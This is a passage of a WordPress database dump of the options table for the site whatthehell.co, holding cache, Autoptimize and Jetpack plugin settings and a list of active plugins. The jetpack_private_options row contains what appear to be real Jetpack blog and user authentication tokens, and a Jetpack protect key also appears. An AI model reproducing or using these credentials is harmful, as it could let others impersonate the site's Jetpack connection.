_page_enable\";s:1:\"1\";s:35:\"cache_clear_custom_post_type_enable\";s:1:\"1\";s:30:\"cache_clear_author_page_enable\";s:1:\"1\";s:32:\"cache_clear_term_category_enable\";s:1:\"1\";s:32:\"cache_clear_term_post_tag_enable\";s:1:\"1\";s:29:\"cache_clear_term_other_enable\";s:1:\"1\";s:32:\"cache_clear_date_archives_enable\";s:1:\"1\";s:23:\"allow_client_side_cache\";s:1:\"0\";s:14:\"when_logged_in\";s:1:\"0\";s:12:\"get_requests\";s:1:\"0\";s:23:\"ignore_get_request_vars\";s:5:\"utm_*\";s:12:\"feeds_enable\";s:1:\"0\";s:18:\"cache_404_requests\";s:1:\"0\";s:18:\"cache_nonce_values\";s:1:\"0\";s:33:\"cache_nonce_values_when_logged_in\";s:1:\"1\";s:13:\"exclude_hosts\";s:0:\"\";s:12:\"exclude_uris\";s:0:\"\";s:24:\"exclude_client_side_uris\";s:0:\"\";s:12:\"exclude_refs\";s:0:\"\";s:14:\"exclude_agents\";s:13:\"w3c_validator\";s:12:\"version_salt\";s:0:\"\";s:20:\"mobile_adaptive_salt\";s:36:\"os.name + device.type + browser.name\";s:27:\"mobile_adaptive_salt_enable\";s:1:\"0\";s:24:\"ua_info_last_data_update\";s:1:\"0\";s:12:\"htmlc_enable\";s:1:\"0\";s:20:\"htmlc_css_exclusions\";s:34:\"id=\'rs-plugin-settings-inline-css\'\";s:19:\"htmlc_js_exclusions\";s:5:\".php?\";s:20:\"htmlc_uri_exclusions\";s:0:\"\";s:27:\"htmlc_cache_expiration_time\";s:7:\"14 days\";s:36:\"htmlc_compress_combine_head_body_css\";s:1:\"1\";s:30:\"htmlc_compress_combine_head_js\";s:1:\"1\";s:32:\"htmlc_compress_combine_footer_js\";s:1:\"1\";s:36:\"htmlc_compress_combine_remote_css_js\";s:1:\"1\";s:29:\"htmlc_compress_inline_js_code\";s:1:\"1\";s:23:\"htmlc_compress_css_code\";s:1:\"1\";s:22:\"htmlc_compress_js_code\";s:1:\"1\";s:24:\"htmlc_compress_html_code\";s:1:\"1\";s:27:\"htmlc_amp_exclusions_enable\";s:1:\"1\";s:20:\"htmlc_when_logged_in\";s:1:\"0\";s:17:\"auto_cache_enable\";s:1:\"0\";s:19:\"auto_cache_max_time\";s:3:\"900\";s:16:\"auto_cache_delay\";s:3:\"500\";s:22:\"auto_cache_sitemap_url\";s:11:\"sitemap.xml\";s:26:\"auto_cache_ms_children_too\";s:1:\"0\";s:21:\"auto_cache_other_urls\";s:0:\"\";s:21:\"auto_cache_user_agent\";s:9:\"WordPress\";s:31:\"htaccess_browser_caching_enable\";s:1:\"0\";s:20:\"htaccess_gzip_enable\";s:1:\"0\";s:32:\"htaccess_enforce_exact_host_name\";s:1:\"0\";s:31:\"htaccess_enforce_canonical_urls\";s:1:\"0\";s:36:\"htaccess_access_control_allow_origin\";s:1:\"0\";s:10:\"cdn_enable\";s:1:\"0\";s:8:\"cdn_host\";s:0:\"\";s:9:\"cdn_hosts\";s:0:\"\";s:20:\"cdn_invalidation_var\";s:2:\"iv\";s:24:\"cdn_invalidation_counter\";s:1:\"1\";s:12:\"cdn_over_ssl\";s:1:\"0\";s:18:\"cdn_when_logged_in\";s:1:\"0\";s:26:\"cdn_whitelisted_extensions\";s:0:\"\";s:26:\"cdn_blacklisted_extensions\";s:0:\"\";s:28:\"cdn_whitelisted_uri_patterns\";s:0:\"\";s:28:\"cdn_blacklisted_uri_patterns\";s:0:\"\";s:12:\"stats_enable\";s:1:\"1\";s:22:\"stats_admin_bar_enable\";s:1:\"1\";s:26:\"stats_admin_bar_roles_caps\";s:0:\"\";s:36:\"dir_stats_auto_refresh_max_resources\";s:4:\"1500\";s:22:\"dir_stats_refresh_time\";s:10:\"15 minutes\";s:22:\"dir_stats_history_days\";s:2:\"30\";s:16:\"pro_update_check\";s:1:\"1\";s:23:\"pro_update_check_stable\";s:1:\"1\";s:21:\"last_pro_update_check\";s:1:\"0\";s:18:\"latest_pro_version\";s:6:\"170220\";s:18:\"latest_pro_package\";s:0:\"\";s:19:\"pro_update_username\";s:0:\"\";s:19:\"pro_update_password\";s:0:\"\";s:22:\"pro_auto_update_enable\";s:1:\"0\";s:18:\"last_pro_stats_log\";s:1:\"0\";s:21:\"uninstall_on_deletion\";s:1:\"0\";}','no'),(5956,'autoptimize_version','3.1.11','yes'),(5957,'autoptimize_service_availablity','a:2:{s:12:\"extra_imgopt\";a:3:{s:6:\"status\";s:2:\"up\";s:5:\"hosts\";a:1:{i:1;s:28:\"https://sp-ao.shortpixel.ai/\";}s:16:\"launch-threshold\";s:4:\"4096\";}s:7:\"critcss\";a:2:{s:6:\"status\";s:2:\"up\";s:5:\"hosts\";a:1:{i:1;s:24:\"https://criticalcss.com/\";}}}','yes'),(5958,'autoptimize_ccss_version','AO_3.1.11','yes'),(5964,'autoptimize_imgopt_launched','on','yes'),(5981,'autoptimize_html','on','yes'),(5982,'autoptimize_html_keepcomments','','yes'),(5983,'autoptimize_enable_site_config','on','yes'),(5984,'autoptimize_js','on','yes'),(5985,'autoptimize_js_aggregate','on','yes'),(5986,'autoptimize_js_exclude','wp-includes/js/dist/, wp-includes/js/tinymce/, js/jquery/jquery.js, js/jquery/jquery.min.js,wp-content/plugins/elfsight-whatsapp-chat-cc/assets/elfsight-whatsapp-chat.js','yes'),(5987,'autoptimize_js_trycatch','','yes'),(5988,'autoptimize_js_justhead','','yes'),(5989,'autoptimize_js_forcehead','','yes'),(5990,'autoptimize_js_include_inline','','yes'),(5991,'autoptimize_css','on','yes'),(5992,'autoptimize_css_aggregate','on','yes'),(5993,'autoptimize_css_exclude','wp-content/cache/, wp-content/uploads/, admin-bar.min.css, dashicons.min.css, wp-content/themes/Divi/style.css','yes'),(5994,'autoptimize_css_justhead','','yes'),(5995,'autoptimize_css_datauris','','yes'),(5996,'autoptimize_css_defer','on','yes'),(5997,'autoptimize_css_defer_inline','','yes'),(5998,'autoptimize_css_inline','','yes'),(5999,'autoptimize_css_include_inline','on','yes'),(6000,'autoptimize_cdn_url','','yes'),(6001,'autoptimize_cache_clean','0','yes'),(6002,'autoptimize_cache_nogzip','on','yes'),(6003,'autoptimize_optimize_logged','on','yes'),(6004,'autoptimize_optimize_checkout','','yes'),(6005,'autoptimize_minify_excluded','on','yes'),(6006,'autoptimize_cache_fallback','on','yes'),(6013,'autoptimize_extra_settings','a:5:{s:31:\"autoptimize_extra_radio_field_4\";s:1:\"1\";s:34:\"autoptimize_extra_checkbox_field_1\";s:1:\"1\";s:30:\"autoptimize_extra_text_field_2\";s:0:\"\";s:30:\"autoptimize_extra_text_field_7\";s:0:\"\";s:30:\"autoptimize_extra_text_field_3\";s:0:\"\";}','yes'),(6026,'jetpack_activated','1','yes'),(6029,'jetpack_activation_source','a:2:{i:0;s:8:\"featured\";i:1;N;}','yes'),(6030,'jetpack_sync_settings_disable','0','yes'),(6031,'jetpack_options','a:11:{s:7:\"version\";s:17:\"13.2.2:1711142686\";s:11:\"old_version\";s:17:\"13.2.1:1710278795\";s:14:\"last_heartbeat\";i:1708468656;s:28:\"fallback_no_verify_ssl_certs\";i:0;s:9:\"time_diff\";i:0;s:2:\"id\";i:182846828;s:6:\"public\";i:1;s:11:\"master_user\";i:1;s:16:\"first_admin_view\";b:1;s:30:\"recommendations_banner_enabled\";b:0;s:9:\"hide_jitm\";a:1:{s:6:\"backup\";a:2:{s:14:\"last_dismissal\";i:1627065453;s:6:\"number\";i:1;}}}','yes'),(6043,'jetpack_available_modules','a:1:{s:6:\"13.2.2\";a:45:{s:5:\"blaze\";s:4:\"12.3\";s:8:\"carousel\";s:3:\"1.5\";s:13:\"comment-likes\";s:3:\"5.1\";s:8:\"comments\";s:3:\"1.4\";s:12:\"contact-form\";s:3:\"1.3\";s:9:\"copy-post\";s:3:\"7.0\";s:20:\"custom-content-types\";s:3:\"3.1\";s:10:\"custom-css\";s:3:\"1.7\";s:21:\"enhanced-distribution\";s:3:\"1.2\";s:16:\"google-analytics\";s:3:\"4.5\";s:12:\"google-fonts\";s:6:\"10.8.0\";s:19:\"gravatar-hovercards\";s:3:\"1.1\";s:15:\"infinite-scroll\";s:3:\"2.0\";s:8:\"json-api\";s:3:\"1.9\";s:5:\"latex\";s:3:\"1.1\";s:5:\"likes\";s:3:\"2.2\";s:8:\"markdown\";s:3:\"2.8\";s:9:\"masterbar\";s:3:\"4.8\";s:7:\"monitor\";s:3:\"2.6\";s:5:\"notes\";s:3:\"1.9\";s:10:\"photon-cdn\";s:3:\"6.6\";s:6:\"photon\";s:3:\"2.0\";s:13:\"post-by-email\";s:3:\"2.0\";s:9:\"post-list\";s:4:\"11.3\";s:7:\"protect\";s:3:\"3.4\";s:9:\"publicize\";s:3:\"2.0\";s:13:\"related-posts\";s:3:\"2.9\";s:6:\"search\";s:3:\"5.0\";s:9:\"seo-tools\";s:3:\"4.4\";s:10:\"sharedaddy\";s:3:\"1.1\";s:10:\"shortcodes\";s:3:\"1.1\";s:10:\"shortlinks\";s:3:\"1.1\";s:8:\"sitemaps\";s:3:\"3.9\";s:3:\"sso\";s:3:\"2.6\";s:5:\"stats\";s:3:\"1.1\";s:13:\"subscriptions\";s:3:\"1.2\";s:13:\"tiled-gallery\";s:3:\"2.1\";s:10:\"vaultpress\";s:5:\"0:1.2\";s:18:\"verification-tools\";s:3:\"3.0\";s:10:\"videopress\";s:3:\"2.5\";s:3:\"waf\";s:4:\"10.9\";s:17:\"widget-visibility\";s:3:\"2.4\";s:7:\"widgets\";s:3:\"1.2\";s:21:\"woocommerce-analytics\";s:3:\"8.4\";s:7:\"wordads\";s:5:\"4.5.0\";}}','yes'),(6044,'jetpack_tos_agreed','1','yes'),(6045,'jetpack_secrets','a:0:{}','no'),(6047,'jetpack_private_options','a:2:{s:10:\"blog_token\";s:65:\"WEpG@M(z!h9h&6wuF@bzN9OEKzAeJg!1.6zXh39ys!DF789tDpzSEib^dte0y(mpS\";s:11:\"user_tokens\";a:1:{i:1;s:67:\"e4rIXJB1$s^t3IOxwewyHlJ#5sK3fBx6.axYDow@FdDjP0o^rfzPGw%y6jfZ9ZzzN.1\";}}','yes'),(6050,'jetpack_unique_connection','a:3:{s:9:\"connected\";i:1;s:12:\"disconnected\";i:0;s:7:\"version\";s:5:\"3.6.1\";}','yes'),(6051,'jetpack_sync_settings_max_queue_size','5000','yes'),(6052,'jetpack_sync_settings_max_queue_lag','7200','yes'),(6053,'jetpack_sync_full_status','a:4:{s:7:\"started\";i:1600107526;s:8:\"finished\";i:1600107536;s:8:\"progress\";a:5:{s:7:\"options\";a:1:{s:8:\"finished\";b:1;}s:9:\"functions\";a:1:{s:8:\"finished\";b:1;}s:9:\"constants\";a:1:{s:8:\"finished\";b:1;}s:5:\"users\";a:4:{s:5:\"total\";s:1:\"1\";s:4:\"sent\";i:1;s:8:\"finished\";b:1;s:9:\"last_sent\";s:1:\"1\";}s:15:\"network_options\";a:1:{s:8:\"finished\";b:1;}}s:6:\"config\";a:5:{s:7:\"options\";b:1;s:9:\"functions\";b:1;s:9:\"constants\";b:1;s:5:\"users\";a:1:{i:0;i:1;}s:15:\"network_options\";b:1;}}','no'),(6054,'jetpack_sync_settings_dequeue_max_bytes','500000','yes'),(6055,'jetpack_sync_settings_upload_max_bytes','600000','yes'),(6056,'jetpack_sync_settings_upload_max_rows','500','yes'),(6057,'jetpack_sync_settings_sync_wait_time','10','yes'),(6058,'jetpack_sync_settings_sync_wait_threshold','10','yes'),(6059,'jetpack_sync_settings_enqueue_wait_time','1','yes'),(6060,'jetpack_sync_settings_queue_max_writes_sec','100','yes'),(6061,'jetpack_sync_settings_post_types_blacklist','a:0:{}','yes'),(6062,'jetpack_sync_settings_taxonomies_blacklist','a:0:{}','yes'),(6063,'jetpack_sync_settings_render_filtered_content','0','yes'),(6064,'jetpack_sync_settings_post_meta_whitelist','a:0:{}','yes'),(6065,'jetpack_sync_settings_comment_meta_whitelist','a:0:{}','yes'),(6066,'jetpack_sync_settings_max_enqueue_full_sync','100','yes'),(6067,'jetpack_sync_settings_max_queue_size_full_sync','1000','yes'),(6068,'jetpack_sync_settings_sync_via_cron','1','yes'),(6069,'jetpack_sync_settings_cron_sync_time_limit','240','yes'),(6070,'jetpack_sync_settings_known_importers','a:6:{s:16:\"Blogger_Importer\";s:7:\"blogger\";s:13:\"LJ_API_Import\";s:11:\"livejournal\";s:9:\"MT_Import\";s:2:\"mt\";s:10:\"RSS_Import\";s:3:\"rss\";s:20:\"WC_Tax_Rate_Importer\";s:12:\"woo-tax-rate\";s:9:\"WP_Import\";s:9:\"wordpress\";}','yes'),(6071,'jetpack_sync_settings_term_relationships_full_sync_item_size','100','yes'),(6072,'jetpack_sync_settings_sync_sender_enabled','1','yes'),(6073,'jetpack_sync_settings_full_sync_sender_enabled','1','yes'),(6074,'jetpack_sync_settings_full_sync_send_duration','9','yes'),(6075,'jetpack_sync_settings_full_sync_limits','a:5:{s:5:\"users\";a:2:{s:10:\"chunk_size\";i:100;s:10:\"max_chunks\";i:10;}s:5:\"terms\";a:2:{s:10:\"chunk_size\";i:1000;s:10:\"max_chunks\";i:10;}s:5:\"posts\";a:2:{s:10:\"chunk_size\";i:100;s:10:\"max_chunks\";i:1;}s:8:\"comments\";a:2:{s:10:\"chunk_size\";i:100;s:10:\"max_chunks\";i:10;}s:18:\"term_relationships\";a:2:{s:10:\"chunk_size\";i:1000;s:10:\"max_chunks\";i:10;}}','yes'),(6078,'jetpack_plugin_api_action_links','a:7:{s:19:\"akismet/akismet.php\";a:1:{s:8:\"Settings\";s:56:\"https://whatthehell.co/wp-admin/?page=akismet-key-config\";}s:27:\"autoptimize/autoptimize.php\";a:1:{s:8:\"Settings\";s:68:\"https://whatthehell.co/wp-admin/options-general.php?page=autoptimize\";}s:27:\"comet-cache/comet-cache.php\";a:3:{s:8:\"Settings\";s:58:\"https://whatthehell.co/wp-admin/admin.php?page=comet_cache\";s:20:\"Preview Pro Features\";s:84:\"https://whatthehell.co/wp-admin/admin.php?page=comet_cache&comet_cache_pro_preview=1\";s:7:\"Upgrade\";s:29:\"http://cometcache.com/prices/\";}s:39:\"elfsight-popup-cc/elfsight-popup-cc.php\";a:2:{s:8:\"Settings\";s:61:\"https://whatthehell.co/wp-admin/admin.php?page=elfsight-popup\";s:24:\"More plugins by Elfsight\";s:58:\"http://codecanyon.net/user/elfsight/portfolio?ref=Elfsight\";}s:55:\"elfsight-whatsapp-chat-cc/elfsight-whatsapp-chat-cc.php\";a:2:{s:8:\"Settings\";s:69:\"https://whatthehell.co/wp-admin/admin.php?page=elfsight-whatsapp-chat\";s:24:\"More plugins by Elfsight\";s:58:\"http://codecanyon.net/user/elfsight/portfolio?ref=Elfsight\";}s:19:\"jetpack/jetpack.php\";a:1:{s:10:\"My Jetpack\";s:57:\"https://whatthehell.co/wp-admin/admin.php?page=my-jetpack\";}s:29:\"wp-mail-smtp/wp_mail_smtp.php\";a:3:{s:20:\"Get WP Mail SMTP Pro\";s:162:\"https://wpmailsmtp.com/lite-upgrade/?utm_source=WordPress&utm_medium=all-plugins&utm_campaign=liteplugin&utm_locale=en_us&utm_content=Get%20WP%20Mail%20SMTP%20Pro\";s:8:\"Settings\";s:59:\"https://whatthehell.co/wp-admin/admin.php?page=wp-mail-smtp\";s:4:\"Docs\";s:139:\"https://wpmailsmtp.com/docs/?utm_source=WordPress&utm_medium=all-plugins&utm_campaign=liteplugin&utm_locale=en_us&utm_content=Documentation\";}}','yes'),(6088,'jetpack_protect_key','ff43ebc2c1925ce95b7a2e769cd1ee202ca352b9','no'),(6109,'jetpack_constants_sync_checksum','a:21:{s:16:\"EMPTY_TRASH_DAYS\";i:2473281379;s:17:\"WP_POST_REVISIONS\";i:4261170317;s:26:\"AUTOMATIC_UPDATER_DISABLED\";i:634125391;s:7:\"ABSPATH\";i:1248058860;s:14:\"WP_CONTENT_DIR\";i:3567882494;s:9:\"FS_METHOD\";i:3577458903;s:18:\"DISALLOW_FILE_EDIT\";i:634125391;s:18:\"DISALLOW_FILE_MODS\";i:634125391;s:19:\"WP_AUTO_UPDATE_CORE\";i:634125391;s:22:\"WP_HTTP_BLOCK_EXTERNAL\";i:634125391;s:19:\"WP_ACCESSIBLE_HOSTS\";i:634125391;s:16:\"JETPACK__VERSION\";i:2090581655;s:12:\"IS_PRESSABLE\";i:634125391;s:15:\"DISABLE_WP_CRON\";i:634125391;s:17:\"ALTERNATE_WP_CRON\";i:634125391;s:20:\"WP_CRON_LOCK_TIMEOUT\";i:3994858278;s:11:\"PHP_VERSION\";i:3059003213;s:15:\"WP_MEMORY_LIMIT\";i:1474498405;s:19:\"WP_MAX_MEMORY_LIMIT\";i:1119786639;s:8:\"WP_DEBUG\";i:734881840;s:16:\"ATOMIC_CLIENT_ID\";i:634125391;}','yes'),(6110,'jetpack_sync_https_history_main_network_site_url','a:5:{i:0;s:5:\"https\";i:1;s:5:\"https\";i:2;s:5:\"https\";i:3;s:5:\"https\";i:4;s:5:\"https\";}','yes'),(6111,'jetpack_sync_https_history_site_url','a:5:{i:0;s:5:\"https\";i:1;s:5:\"https\";i:2;s:5:\"https\";i:3;s:5:\"https\";i:4;s:5:\"https\";}','yes'),(6112,'jetpack_sync_https_history_home_url','a:5:{i:0;s:5:\"https\";i:1;s:5:\"https\";i:2;s:5:\"https\";i:3;s:5:\"https\";i:4;s:5:\"https\";}','yes'),(6151,'jetpack_callables_sync_checksum','a:39:{s:18:\"wp_max_upload_size\";i:3220964978;s:15:\"is_main_network\";i:734881840;s:13:\"is_multi_site\";i:734881840;s:17:\"main_network_site\";i:342201707;s:26:\"main_network_site_wpcom_id\";i:810899632;s:8:\"site_url\";i:342201707;s:8:\"home_url\";i:342201707;s:16:\"single_user_site\";i:4261170317;s:7:\"updates\";i:2252358820;s:28:\"has_file_system_write_access\";i:4261170317;s:21:\"is_version_controlled\";i:734881840;s:10:\"taxonomies\";i:2234126450;s:10:\"post_types\";i:4216076190;s:18:\"post_type_features\";i:1784007715;s:10:\"shortcodes\";i:707697700;s:27:\"rest_api_allowed_post_types\";i:2544842423;s:32:\"rest_api_allowed_public_metadata\";i:3610467939;s:10:\"wp_version\";i:3990996156;s:11:\"get_plugins\";i:1120775866;s:24:\"get_plugins_action_links\";i:1979503336;s:14:\"active_modules\";i:95478062;s:16:\"hosting_provider\";i:769900095;s:6:\"locale\";i:110763218;s:13:\"site_icon_url\";i:1750872591;s:5:\"roles\";i:2749916070;s:8:\"timezone\";i:3808505409;s:24:\"available_jetpack_blocks\";i:650051311;s:13:\"paused_themes\";i:223132457;s:14:\"paused_plugins\";i:223132457;s:24:\"sso_is_two_step_required\";i:734881840;s:26:\"sso_should_hide_login_form\";i:734881840;s:18:\"sso_match_by_email\";i:4261170317;s:21:\"sso_new_user_override\";i:734881840;s:29:\"sso_bypass_default_login_form\";i:734881840;s:13:\"theme_support\";i:4148652944;s:23:\"wp_get_environment_type\";i:1138987844;s:10:\"get_themes\";i:1484566526;s:12:\"is_fse_theme\";i:734881840;s:21:\"get_loaded_extensions\";i:3156897930;}','no'),(6152,'jpsq_sync_checkout','0:0','no'),(6155,'jetpack_testimonial','0','yes'),(6157,'jetpack_next_sync_time_sync','1711237952','yes'),(6159,'jetpack_next_sync_time_full-sync-enqueue','1626855072','yes'),(6221,'stats_options','a:7:{s:9:\"admin_bar\";b:1;s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:11:\"count_roles\";a:0:{}s:7:\"blog_id\";i:182846828;s:12:\"do_not_track\";b:1;s:10:\"hide_smile\";b:1;s:7:\"version\";s:1:\"9\";}','yes'),(6223,'jetpack_protect_blocked_attempts','43138','no'),(6228,'trusted_ip_header','O:8:\"stdClass\":3:{s:14:\"trusted_header\";s:20:\"HTTP_X_FORWARDED_FOR\";s:8:\"segments\";i:0;s:7:\"reverse\";b:0;}','no'),(6253,'sharing-options','a:1:{s:6:\"global\";a:5:{s:12:\"button_style\";s:9:\"icon-text\";s:13:\"sharing_label\";s:11:\"Share this:\";s:10:\"open_links\";s:4:\"same\";s:4:\"show\";a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}s:6:\"custom\";a:0:{}}}','yes'),(6255,'post_by_email_address1','NULL','yes'),(6256,'monitor_receive_notifications','1','yes'),(6270,'tiled_galleries','1','yes'),(6278,'verification_services_codes','0','yes'),(6712,'jetpack_updates_sync_checksum','a:3:{s:14:\"update_plugins\";i:2484874460;s:13:\"update_themes\";i:3456002852;s:11:\"update_core\";i:2558402009;}','yes'),(12639,'stats_cache','a:2:{s:32:\"ee99c6bd5f5480da27cafad6445ad7ed\";a:1:{i:1681305801;a:4:{i:0;a:4:{s:7:\"post_id\";s:3:\"134\";s:10:\"post_title\";s:4:\"Home\";s:14:\"post_permalink\";s:27:\"https://www.whatthehell.co/\";s:5:\"views\";s:2:\"10\";}i:1;a:4:{s:7:\"post_id\";s:3:\"396\";s:10:\"post_title\";s:4:\"Work\";s:14:\"post_permalink\";s:32:\"https://www.whatthehell.co/work/\";s:5:\"views\";s:1:\"3\";}i:2;a:4:{s:7:\"post_id\";s:3:\"392\";s:10:\"post_title\";s:8:\"about-us\";s:14:\"post_permalink\";s:36:\"https://www.whatthehell.co/about-us/\";s:5:\"views\";s:1:\"2\";}i:3;a:4:{s:7:\"post_id\";s:3:\"401\";s:10:\"post_title\";s:7:\"CONTACT\";s:14:\"post_permalink\";s:31:\"https://whatthehell.co/contact/\";s:5:\"views\";s:1:\"2\";}}}s:32:\"fe83cd2405aa9f43b4fb28b0d7e66287\";a:1:{i:1681305801;a:0:{}}}','yes'),(12660,'active_plugins','a:9:{i:0;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:1;s:91:\"all-in-one-wp-migration-unlimited-extension/all-in-one-wp-migration-unlimited-extension.php\";i:2;s:19:\"akismet/akismet.php\";i:3;s:27:\"autoptimize/autoptimize.php\";i:4;s:27:\"comet-cache/comet-cache.php\";i:5;s:39:\"elfsight-popup-cc/elfsight-popup-cc.php\";i:6;s:55:\"elfsight-whatsapp-chat-cc/elfsight-whatsapp-chat-cc.php\";i:7;s:19:\"jetpack/jetpack.php\";i:8;s:29:\"wp-mail-smtp/wp_mail_smtp.php\";}','yes'),(12665,'template','Divi','yes'),(12666,'stylesheet','Divi','yes'),(12673,'et_pb_contact_form_4141471c207485b0eb318f9a690cf19b','off','yes'),(12833,'autoptimize_imgopt_settings','a:3:{s:33:\"autoptimize_imgopt_select_field_2\";s:1:\"2\";s:35:\"autoptimize_imgopt_checkbox_field_3\";s:1:\"1\";s:31:\"autoptimize_imgopt_text_field_5\";s:0:\"\";}','yes'),(12905,'jetpack_safe_mode_confirmed','1','yes'),(12909,'jetpack_active_plan','a:10:{s:10:\"product_id\";i:2002;s:12:\"product_slug\";s:12:\"jetpack_free\";s:12:\"product_name\";s:12:\"Jetpack Free\";s:18:\"product_name_short\";s:4:\"Free\";s:7:\"expired\";b:0;s:14:\"billing_period\";s:0:\"\";s:13:\"user_is_owner\";b:0;s:7:\"is_free\";b:1;s:11:\"license_key\";s:0:\"\";s:8:\"features\";a:2:{s:6:\"active\";a:17:{i:0;s:12:\"advanced-seo\";i:1;s:3:\"cdn\";i:2;s:9:\"donations\";i:3;s:17:\"jetpack-dashboard\";i:4;s:18:\"recurring-payments\";i:5;s:11:\"republicize\";i:6;s:17:\"security-settings\";i:7;s:17:\"seo-preview-tools\";i:8;s:14:\"send-a-message\";i:9;s:15:\"social-previews\";i:10;s:18:\"upload-audio-files\";i:11;s:18:\"upload-video-files\";i:12;s:15:\"whatsapp-button\";i:13;s:25:\"social-image-auto-convert\";i:14;s:26:\"social-mastodon-connection\";i:15;s:27:\"social-instagram-connection\";i:16;s:24:\"social-multi-connections\";}s:9:\"available\";a:43:{s:7:\"akismet\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:8:\"antispam\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:7:\"backups\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:13:\"backups-daily\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:8:\"calendly\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:20:\"cloudflare-analytics\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:14:\"cloudflare-cdn\";a:15:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";i:4;s:22:\"jetpack_security_daily\";i:5;s:30:\"jetpack_security_daily_monthly\";i:6;s:25:\"jetpack_security_realtime\";i:7;s:33:\"jetpack_security_realtime_monthly\";i:8;s:16:\"jetpack_complete\";i:9;s:24:\"jetpack_complete_monthly\";i:10;s:29:\"jetpack_security_t1_bi_yearly\";i:11;s:26:\"jetpack_security_t1_yearly\";i:12;s:27:\"jetpack_security_t1_monthly\";i:13;s:26:\"jetpack_security_t2_yearly\";i:14;s:27:\"jetpack_security_t2_monthly\";}s:10:\"core/audio\";a:17:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:16:\"jetpack_personal\";i:3;s:23:\"jetpack_premium_monthly\";i:4;s:24:\"jetpack_business_monthly\";i:5;s:24:\"jetpack_personal_monthly\";i:6;s:22:\"jetpack_security_daily\";i:7;s:30:\"jetpack_security_daily_monthly\";i:8;s:25:\"jetpack_security_realtime\";i:9;s:33:\"jetpack_security_realtime_monthly\";i:10;s:16:\"jetpack_complete\";i:11;s:24:\"jetpack_complete_monthly\";i:12;s:29:\"jetpack_security_t1_bi_yearly\";i:13;s:26:\"jetpack_security_t1_yearly\";i:14;s:27:\"jetpack_security_t1_monthly\";i:15;s:26:\"jetpack_security_t2_yearly\";i:16;s:27:\"jetpack_security_t2_monthly\";}s:10:\"core/cover\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:16:\"jetpack_business\";i:2;s:23:\"jetpack_premium_monthly\";i:3;s:24:\"jetpack_business_monthly\";}s:10:\"core/video\";a:4:{i:0;s:15:\"jetpack_premium\";i:1;s:1